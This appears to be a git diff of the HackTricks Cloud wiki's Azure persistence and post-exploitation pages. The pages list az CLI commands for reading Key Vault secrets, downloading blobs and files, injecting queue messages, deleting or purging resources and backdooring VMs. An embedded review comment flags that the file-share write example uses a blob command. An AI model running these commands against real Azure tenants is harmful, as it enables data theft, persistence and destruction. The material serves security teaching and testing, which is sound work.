- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md b/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md new file mode 100644 index 000000000..cd39ab3bb --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md @@ -0,0 +1,31 @@ +# Az - Queue Storage Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## Queue + +For more information check: + +{{#ref}} +../az-services/az-queue-enum.md +{{#endref}} + +### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write` + +This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks. + +```bash +az storage queue create --name --account-name + +az storage queue metadata update --name --metadata key1=value1 key2=value2 --account-name + +az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name +``` + +## References + +- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues +- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api +- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md new file mode 100644 index 000000000..ab01d48bf --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md 
@@ -0,0 +1,41 @@ +# Az - Storage Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## Storage Privesc + +For more information about storage check: + +{{#ref}} +../az-services/az-storage.md +{{#endref}} + +### Common tricks + +- Keep the access keys +- Generate SAS + - User delegated are 7 days max + +### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write + +These permissions allows the user to modify blob service properties for the container delete retention feature, which enables or configures the retention period for deleted containers. These permissions can be used for maintaining persistence to provide a window of opportunity for the attacker to recover or manipulate deleted containers that should have been permanently removed and accessing sensitive information. + +```bash +az storage account blob-service-properties update \ + --account-name \ + --enable-container-delete-retention true \ + --container-delete-retention-days 100 +``` + +### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action + +These permissions can lead to the attacker to modify the retention policies, restoring deleted data, and accessing sensitive information. + +```bash +az storage blob service-properties delete-policy update \ + --account-name \ + --enable true \ + --days-retained 100 +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md new file mode 100644 index 000000000..00cfdd9a4 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md 
@@ -0,0 +1,25 @@ +# Az - VMs Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## VMs persistence + +For more information about VMs check: + +{{#ref}} +../az-services/vms/ +{{#endref}} + +### Backdoor VM applications, VM Extensions & Images + +An attacker identifies applications, extensions or images being frequently used in the Azure account, he could insert his code in VM applications and extensions so every time they get installed the backdoor is executed. + +### Backdoor Instances + +An attacker could get access to the instances and backdoor them: + +- Using a traditional **rootkit** for example +- Adding a new **public SSH key** (check [EC2 privesc options](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc)) +- Backdooring the **User Data** + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/README.md b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md similarity index 100% rename from pentesting-cloud/azure-security/az-post-exploitation/README.md rename to src/pentesting-cloud/azure-security/az-post-exploitation/README.md diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md new file mode 100644 index 000000000..4860a9862 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md 
@@ -0,0 +1,45 @@ +# Az - Blob Storage Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## Storage Privesc + +For more information about storage check: + +{{#ref}} +../az-services/az-storage.md +{{#endref}} + +### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read + +A principal with this permission will be able to **list** the blobs (files) inside a container and **download** the files which might contain **sensitive information**. + +```bash +# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read +az storage blob list \ + --account-name \ + --container-name --auth-mode login + +az storage blob download \ + --account-name \ + --container-name \ + -n file.txt --auth-mode login +``` + +### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write + +A principal with this permission will be able to **write and overwrite files in containers** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a blob): + +```bash +# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write +az storage blob upload \ + --account-name \ + --container-name \ + --file /tmp/up.txt --auth-mode login --overwrite +``` + +### \*/delete + +This would allow to delete objects inside the storage account which might **interrupt some services** or make the client **lose valuable information**. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md new file mode 100644 index 000000000..04ac0fa8c --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md 
@@ -0,0 +1,48 @@ +# Az - File Share Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +File Share Post Exploitation + +For more information about file shares check: + +{{#ref}} +../az-services/az-file-shares.md +{{#endref}} + +### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read + +A principal with this permission will be able to **list** the files inside a file share and **download** the files which might contain **sensitive information**. + +```bash +# List files inside an azure file share +az storage file list \ + --account-name \ + --share-name \ + --auth-mode login --enable-file-backup-request-intent + +# Download an specific file +az storage file download \ + --account-name \ + --share-name \ + --path \ + --dest /path/to/down \ + --auth-mode login --enable-file-backup-request-intent +``` + +### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write, Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action + +A principal with this permission will be able to **write and overwrite files in file shares** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a file share): + +```bash +az storage blob upload \ + --account-name \ + --container-name \ + --file /tmp/up.txt --auth-mode login --overwrite +``` + +### \*/delete + +This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md new file mode 100644 index 000000000..d692dbb1a --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md 
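Review bot: The example under the `fileshares/files/write` heading uses `az storage blob upload --container-name`, which targets Blob Storage rather than Azure Files, so the snippet does not exercise the permission the section describes and looks copied from the blob page. The read section just above already uses the Azure Files commands (`az storage file list` / `az storage file download` with `--share-name` and `--enable-file-backup-request-intent`), and the write example should match, e.g. `az storage file upload --account-name <account-name> --share-name <share-name> --source /tmp/up.txt --path <dest-path> --auth-mode login --enable-file-backup-request-intent`. The line "File Share Post Exploitation" after the banner include is plain text rather than a `##` heading, unlike the sibling post-exploitation pages in this commit.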
@@ -0,0 +1,17 @@
+# Az - Function Apps Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Funciton Apps Post Exploitaiton
+
+For more information about function apps check:
+
+{{#ref}}
+../az-services/az-function-apps.md
+{{#endref}}
+
+> [!CAUTION] > **Function Apps post exploitation tricks are very related to the privilege escalation tricks** so you can find all of them there:
+
+{{#ref}}
+../az-privilege-escalation/az-functions-app-privesc.md
+{{#endref}}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
similarity index 57%
rename from pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
rename to src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
index 330853723..e353765a6 100644
--- a/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
@@ -1,40 +1,25 @@ # Az - Key Vault Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Azure Key Vault For more information about this service check: -{% content-ref url="../az-services/keyvault.md" %} -[keyvault.md](../az-services/keyvault.md) -{% endcontent-ref %} +{{#ref}} +../az-services/keyvault.md +{{#endref}} ### Microsoft.KeyVault/vaults/secrets/getSecret/action This permission will allow a principal to read the secret value of secrets: -{% code overflow="wrap" %} ```bash az keyvault secret show --vault-name --name # Get old version secret value az keyvault secret show --id https://.vault.azure.net/secrets// ``` -{% endcode %} ### **Microsoft.KeyVault/vaults/certificates/purge/action** @@ -48,7 +33,6 @@ az keyvault certificate purge --vault-name --name --name --algorithm --value @@ -56,20 +40,17 @@ az keyvault key encrypt --vault-name --name --algorithm echo "HackTricks" | base64 # SGFja1RyaWNrcwo= az keyvault key encrypt --vault-name testing-1231234 --name testing --algorithm RSA-OAEP-256 --value SGFja1RyaWNrcwo= ``` -{% endcode %} ### **Microsoft.KeyVault/vaults/keys/decrypt/action** This permission allows a principal to decrypt data using a key stored in the vault. -{% code overflow="wrap" %} ```bash az keyvault key decrypt --vault-name --name --algorithm --value # Example az keyvault key decrypt --vault-name testing-1231234 --name testing --algorithm RSA-OAEP-256 --value "ISZ+7dNcDJXLPR5MkdjNvGbtYK3a6Rg0ph/+3g1IoUrCwXnF791xSF0O4rcdVyyBnKRu0cbucqQ/+0fk2QyAZP/aWo/gaxUH55pubS8Zjyw/tBhC5BRJiCtFX4tzUtgTjg8lv3S4SXpYUPxev9t/9UwUixUlJoqu0BgQoXQhyhP7PfgAGsxayyqxQ8EMdkx9DIR/t9jSjv+6q8GW9NFQjOh70FCjEOpYKy9pEGdLtPTrirp3fZXgkYfIIV77TXuHHdR9Z9GG/6ge7xc9XT6X9ciE7nIXNMQGGVCcu3JAn9BZolb3uL7PBCEq+k2rH4tY0jwkxinM45tg38Re2D6CEA==" # This is the result from the previous encryption ``` -{% endcode %} ### **Microsoft.KeyVault/vaults/keys/purge/action** 
@@ -91,21 +72,17 @@ az keyvault secret purge --vault-name --name This permission allows a principal to create or update a secret in the vault. -{% code overflow="wrap" %} ```bash az keyvault secret set --vault-name --name --value ``` -{% endcode %} ### **Microsoft.KeyVault/vaults/certificates/delete** This permission allows a principal to delete a certificate from the vault. The certificate is moved to the "soft-delete" state, where it can be recovered unless purged. -{% code overflow="wrap" %} ```bash az keyvault certificate delete --vault-name --name ``` -{% endcode %} ### **Microsoft.KeyVault/vaults/keys/delete** @@ -131,17 +108,4 @@ This permission allows a principal to restore a secret from a backup. az keyvault secret restore --vault-name --file ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md similarity index 59% rename from pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md rename to src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md index 15a9a939d..f96e47597 100644 --- a/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md @@ -1,37 +1,22 @@ # Az - Queue Storage Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Queue For more information check: -{% content-ref url="../az-services/az-queue-enum.md" %} -[az-queue-enum.md](../az-services/az-queue-enum.md) -{% endcontent-ref %} +{{#ref}} +../az-services/az-queue-enum.md +{{#endref}} ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read` An attacker with this permission can peek messages from an Azure Storage Queue. This allows the attacker to view the content of messages without marking them as processed or altering their state. This could lead to unauthorized access to sensitive information, enabling data exfiltration or gathering intelligence for further attacks. -{% code overflow="wrap" %} ```bash az storage message peek --queue-name --account-name ``` -{% endcode %} **Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services. 
@@ -39,27 +24,22 @@ az storage message peek --queue-name --account-name --account-name ``` -{% endcode %} ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/add/action` With this permission, an attacker can add new messages to an Azure Storage Queue. This allows them to inject malicious or unauthorized data into the queue, potentially triggering unintended actions or disrupting downstream services that process the messages. -{% code overflow="wrap" %} ```bash az storage message put --queue-name --content "Injected malicious message" --account-name ``` -{% endcode %} ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write` This permission allows an attacker to add new messages or update existing ones in an Azure Storage Queue. By using this, they could insert harmful content or alter existing messages, potentially misleading applications or causing undesired behaviors in systems that rely on the queue. -{% code overflow="wrap" %} ```bash az storage message put --queue-name --content "Injected malicious message" --account-name 
@@ -71,33 +51,27 @@ az storage message update --queue-name \ --visibility-timeout \ --account-name ``` -{% endcode %} ### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/delete` This permission allows an attacker to delete queues within the storage account. By leveraging this capability, an attacker can permanently remove queues and all their associated messages, causing significant disruption to workflows and resulting in critical data loss for applications that rely on the affected queues. This action can also be used to sabotage services by removing essential components of the system. -{% code overflow="wrap" %} ```bash az storage queue delete --name --account-name ``` -{% endcode %} ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/delete` With this permission, an attacker can clear all messages from an Azure Storage Queue. This action removes all messages, disrupting workflows and causing data loss for systems dependent on the queue. -{% code overflow="wrap" %} ```bash az storage message clear --queue-name --account-name ``` -{% endcode %} ### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write` This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks. -{% code overflow="wrap" %} ```bash az storage queue create --name --account-name 
@@ -105,25 +79,11 @@ az storage queue metadata update --name --metadata key1=value1 key2 az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name ``` -{% endcode %} ## References -* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues -* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api -* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes +- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues +- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api +- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md similarity index 68% rename from pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md rename to src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md index f0f7613da..a82d54e24 100644 --- a/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md @@ -1,140 +1,99 @@ # Az - Service Bus Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Service Bus For more information check: -{% content-ref url="../az-services/az-servicebus-enum.md" %} -[az-servicebus-enum.md](../az-services/az-servicebus-enum.md) -{% endcontent-ref %} +{{#ref}} +../az-services/az-servicebus-enum.md +{{#endref}} ### Actions: `Microsoft.ServiceBus/namespaces/Delete` An attacker with this permission can delete an entire Azure Service Bus namespace. This action removes the namespace and all associated resources, including queues, topics, subscriptions, and their messages, causing widespread disruption and permanent data loss across all dependent systems and workflows. -{% code overflow="wrap" %} ```bash az servicebus namespace delete --resource-group --name ``` -{% endcode %} ### Actions: `Microsoft.ServiceBus/namespaces/topics/Delete` An attacker with this permission can delete an Azure Service Bus topic. This action removes the topic and all its associated subscriptions and messages, potentially causing loss of critical data and disrupting systems and workflows relying on the topic. -{% code overflow="wrap" %} ```bash az servicebus topic delete --resource-group --namespace-name --name ``` -{% endcode %} ### Actions: `Microsoft.ServiceBus/namespaces/queues/Delete` An attacker with this permission can delete an Azure Service Bus queue. This action removes the queue and all the messages within it, potentially causing loss of critical data and disrupting systems and workflows dependent on the queue. -{% code overflow="wrap" %} ```bash az servicebus queue delete --resource-group --namespace-name --name ``` -{% endcode %} ### Actions: `Microsoft.ServiceBus/namespaces/topics/subscriptions/Delete` An attacker with this permission can delete an Azure Service Bus subscription. This action removes the subscription and all its associated messages, potentially disrupting workflows, data processing, and system operations relying on the subscription. 
-{% code overflow="wrap" %} ```bash az servicebus topic subscription delete --resource-group --namespace-name --topic-name --name ``` -{% endcode %} ### Actions: `Microsoft.ServiceBus/namespaces/write` & `Microsoft.ServiceBus/namespaces/read` An attacker with permissions to create or modify Azure Service Bus namespaces can exploit this to disrupt operations, deploy unauthorized resources, or expose sensitive data. They can alter critical configurations such as enabling public network access, downgrading encryption settings, or changing SKUs to degrade performance or increase costs. Additionally, they could disable local authentication, manipulate replica locations, or adjust TLS versions to weaken security controls, making namespace misconfiguration a significant post-exploitation risk. -{% code overflow="wrap" %} ```bash -az servicebus namespace create --resource-group --name --location +az servicebus namespace create --resource-group --name --location az servicebus namespace update --resource-group --name --tags ``` -{% endcode %} - ### Actions: `Microsoft.ServiceBus/namespaces/queues/write` (`Microsoft.ServiceBus/namespaces/queues/read`) An attacker with permissions to create or modify Azure Service Bus queues (to modiffy the queue you will also need the Action:`Microsoft.ServiceBus/namespaces/queues/read`) can exploit this to intercept data, disrupt workflows, or enable unauthorized access. They can alter critical configurations such as forwarding messages to malicious endpoints, adjusting message TTL to retain or delete data improperly, or enabling dead-lettering to interfere with error handling. Additionally, they could manipulate queue sizes, lock durations, or statuses to disrupt service functionality or evade detection, making this a significant post-exploitation risk. 
-{% code overflow="wrap" %} ```bash -az servicebus queue create --resource-group --namespace-name --name +az servicebus queue create --resource-group --namespace-name --name az servicebus queue update --resource-group --namespace-name --name ``` -{% endcode %} ### Actions: `Microsoft.ServiceBus/namespaces/topics/write` (`Microsoft.ServiceBus/namespaces/topics/read`) An attacker with permissions to create or modify topics (to modiffy the topic you will also need the Action:`Microsoft.ServiceBus/namespaces/topics/read`) within an Azure Service Bus namespace can exploit this to disrupt message workflows, expose sensitive data, or enable unauthorized actions. Using commands like az servicebus topic update, they can manipulate configurations such as enabling partitioning for scalability misuse, altering TTL settings to retain or discard messages improperly, or disabling duplicate detection to bypass controls. Additionally, they could adjust topic size limits, change status to disrupt availability, or configure express topics to temporarily store intercepted messages, making topic management a critical focus for post-exploitation mitigation. -{% code overflow="wrap" %} ```bash az servicebus topic create --resource-group --namespace-name --name az servicebus topic update --resource-group --namespace-name --name ``` -{% endcode %} ### Actions: `Microsoft.ServiceBus/namespaces/topics/subscriptions/write` (`Microsoft.ServiceBus/namespaces/topics/subscriptions/read`) An attacker with permissions to create or modify subscriptions (to modiffy the subscription you will also need the Action: `Microsoft.ServiceBus/namespaces/topics/subscriptions/read`) within an Azure Service Bus topic can exploit this to intercept, reroute, or disrupt message workflows. 
Using commands like az servicebus topic subscription update, they can manipulate configurations such as enabling dead lettering to divert messages, forwarding messages to unauthorized endpoints, or modifying TTL and lock duration to retain or interfere with message delivery. Additionally, they can alter status or max delivery count settings to disrupt operations or evade detection, making subscription control a critical aspect of post-exploitation scenarios. - -{% code overflow="wrap" %} ```bash az servicebus topic subscription create --resource-group --namespace-name --topic-name --name az servicebus topic subscription update --resource-group --namespace-name --topic-name --name ``` -{% endcode %} - ### Actions: `AuthorizationRules` Send & Recive Messages Take a look here: -{% content-ref url="../az-services/az-queue-privesc.md" %} -[az-queue-privesc.md](../az-services/az-queue-privesc.md) -{% endcontent-ref %} +{{#ref}} +../az-privilege-escalation/az-queue-privesc.md +{{#endref}} ## References -* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues -* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api -* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes -* https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless -* https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus -* https://learn.microsoft.com/en-us/cli/azure/servicebus/namespace?view=azure-cli-latest -* https://learn.microsoft.com/en-us/cli/azure/servicebus/queue?view=azure-cli-latest +- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues +- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api +- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes +- 
https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless +- https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus +- https://learn.microsoft.com/en-us/cli/azure/servicebus/namespace?view=azure-cli-latest +- https://learn.microsoft.com/en-us/cli/azure/servicebus/queue?view=azure-cli-latest -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md similarity index 62% rename from pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md rename to src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md index 33de6ffd5..905e50bb1 100644 --- a/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md @@ -1,32 +1,19 @@ # Az - SQL Database Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## SQL Database Post Exploitation + For more information about SQL Database check: -{% content-ref url="../az-services/az-sql-database.md" %} -[az-sql-database.md](../az-services/az-sql-database.md) -{% endcontent-ref %} +{{#ref}} +../az-services/az-sql.md +{{#endref}} ### "Microsoft.Sql/servers/databases/read", "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/databases/write" With these permissions, an attacker can create and update databases within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions. -{% code overflow="wrap" %} ```bash # Create Database az sql db create --resource-group --server --name @@ -34,13 +21,11 @@ az sql db create --resource-group --server --name # Update Database az sql db update --resource-group --server --name --max-size ``` -{% endcode %} ### "Microsoft.Sql/servers/elasticPools/write" && "Microsoft.Sql/servers/elasticPools/read" With these permissions, an attacker can create and update elasticPools within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions. -{% code overflow="wrap" %} ```bash # Create Elastic Pool az sql elastic-pool create \ 
